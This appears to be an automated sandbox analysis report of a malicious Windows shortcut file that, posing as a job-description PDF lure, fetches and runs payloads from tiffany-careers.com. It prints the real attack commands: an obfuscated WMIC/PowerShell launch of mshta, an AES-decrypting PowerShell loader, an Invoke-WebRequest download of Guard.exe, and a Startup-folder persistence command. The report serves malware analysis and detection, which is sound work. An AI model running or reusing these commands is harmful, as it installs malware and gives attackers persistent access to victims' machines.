Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.1528320950.0000024648EE8000.00000004.00000020.00020000.00000000.sdmp, duychuan1[1].6.dr
Source: Binary string: sethc.pdb source: duychuan1[1].6.dr
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe, Code function: 16_2_00007FF65605C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00007FF65605C7C0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe, Code function: 16_2_00007FF65605B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00007FF65605B7C0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe, Code function: 16_2_00007FF6560671F4 FindFirstFileW,FindClose,16_2_00007FF6560671F4
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe, Code function: 16_2_00007FF6560672A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00007FF6560672A8
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe, Code function: 16_2_00007FF65605BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00007FF65605BC70
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe, Code function: 16_2_00007FF65606A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00007FF65606A874
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe, Code function: 16_2_00007FF65606A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,16_2_00007FF65606A350
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe, Code function: 16_2_00007FF656066428 FindFirstFileW,FindNextFileW,FindClose,16_2_00007FF656066428
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe, Code function: 16_2_00007FF65606A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,16_2_00007FF65606A4F8
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe, Code function: 16_2_00007FF656022F50 FindFirstFileExW,16_2_00007FF656022F50

Networking

Source: Network traffic, Suricata IDS: 2026434 - Severity 1 - ET MALWARE VBScript Redirect Style Exe File Download : 147.45.49.155:443 -> 192.168.2.8:49704
Source: global traffic, HTTP traffic detected: GET /Job_Description.pdf HTTP/1.1 | Host: tiffany-careers.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /BnQwAP.exe HTTP/1.1 | Host: tiffany-careers.com
Source: global traffic, HTTP traffic detected: GET /jzuVDmQ.txt HTTP/1.1 | Host: tiffany-careers.com | Connection: Keep-Alive
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49713 -> 147.45.49.155:443
Source: global traffic, HTTP traffic detected: GET /duychuan1 HTTP/1.1 | Accept: */* | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: tiffany-careers.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /kfSlwlO HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: tiffany-careers.com | Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF65606E87C InternetReadFile
Source: global traffic DNS traffic detected: DNS query: tiffany-careers.com
Source: global traffic DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic DNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.14.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.8.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000009.00000002.1712169554.000001DD3E97A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1484717292.000001AADF32D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1712169554.000001DD3E751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CAE71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43C26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CB91A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000009.00000002.1712169554.000001DD3E97A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000000.1808350972.0000000000489000.00000002.00000001.01000000.00000010.sdmp, SwiftWrite.pif, 0000001D.00000000.1948220932.0000000000689000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 2D85F72862B55C4EADD9E66E06947F3D0.14.dr String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000005.00000002.1484717292.000001AADF36D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1484717292.000001AADF359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1712169554.000001DD3E751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CAE71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000008.00000003.1518226211.000001FEC7F41000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000008.00000003.1518226211.000001FEC7ED0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000009.00000002.1712169554.000001DD3E97A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000015.00000002.1919253778.00000217E3258000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1712169554.000001DD3EB85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CB914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CB0A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tiffany-careers.com
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tiffany-careers.com/
Source: powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tiffany-careers.com/BnQwAP.exe
Source: powershell.exe, 00000009.00000002.1712169554.000001DD3EB85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tiffany-careers.com/Job_Description.pdf
Source: powershell.exe, 00000005.00000002.1484717292.000001AADF472000.00000004.00000800.00020000.00000000.sdmp, lKin1m7Pf2.lnk String found in binary or memory: https://tiffany-careers.com/duychuan1
Source: powershell.exe String found in binary or memory: https://tiffany-careers.com/duychuan1$global:?
Source: powershell.exe, 00000005.00000002.1484360037.000001AADD6D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiffany-careers.com/duychuan1;.
Source: powershell.exe, 00000005.00000002.1484717292.000001AADF7BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tiffany-careers.com/duychuan1P
Source: powershell.exe, 00000005.00000002.1484592899.000001AADEE30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiffany-careers.com/duychuan1a
Source: powershell.exe, 00000005.00000002.1487314148.000001AAF73FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiffany-careers.com/duychuan1ken=b03f5f
Source: powershell.exe, 00000005.00000002.1484717292.000001AADF5FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1484717292.000001AADF311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tiffany-careers.com/duychuan1p
Source: powershell.exe, 00000015.00000002.1815831767.00000217CB0A1000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.16.dr String found in binary or memory: https://tiffany-careers.com/jzuVDmQ.txt
Source: BnQwAP.exe, 00000010.00000002.1753379248.00000295A1999000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiffany-careers.com/kfSlwlO
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Guard.exe.17.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF656070D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF656070A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF656057E64 GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState

System Summary

Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_4c0db34d-3
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4EC23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_3258dac2-3
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: This is a third-party compiled AutoIt script. 16_2_00007FF655FE37B0
Source: BnQwAP.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: BnQwAP.exe, 00000010.00000000.1703721677.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_1c30fbe3-b
Source: BnQwAP.exe.9.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b23ef89e-9
Source: WMIC.exe, 00000000.00000002.1456334253.0000029CCDADB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')"``memstr_18eb28d4-b
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\BnQwAP.exe
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: lKin1m7Pf2.lnk LNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')"
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF65605BF80: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF65604D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF65605D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: Joe Sandbox View Dropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: String function: 00007FF656008D58 appears 76 times
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Process created: Commandline size = 2544
Source: classification engine Classification label: mal100.expl.evad.winLNK@45/62@4/2
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF656063778 GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF65604D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF65604CCE0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF6560657B0 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF65605BE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF656077E38 CoInitializeSecurity,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Code function: 16_2_00007FF655FE6580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\duychuan1[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:964:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3064:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cp1n5lzj.gus.ps1
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: lKin1m7Pf2.lnkVirustotal: Detection: 25%
Source: lKin1m7Pf2.lnkReversingLabs: Detection: 21%
Source: unknown Process created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')"
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/duychuan1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1616,i,16373349634998890577,12593525989554583629,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\BnQwAP.exe "C:\Users\user\AppData\Roaming\BnQwAP.exe"
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
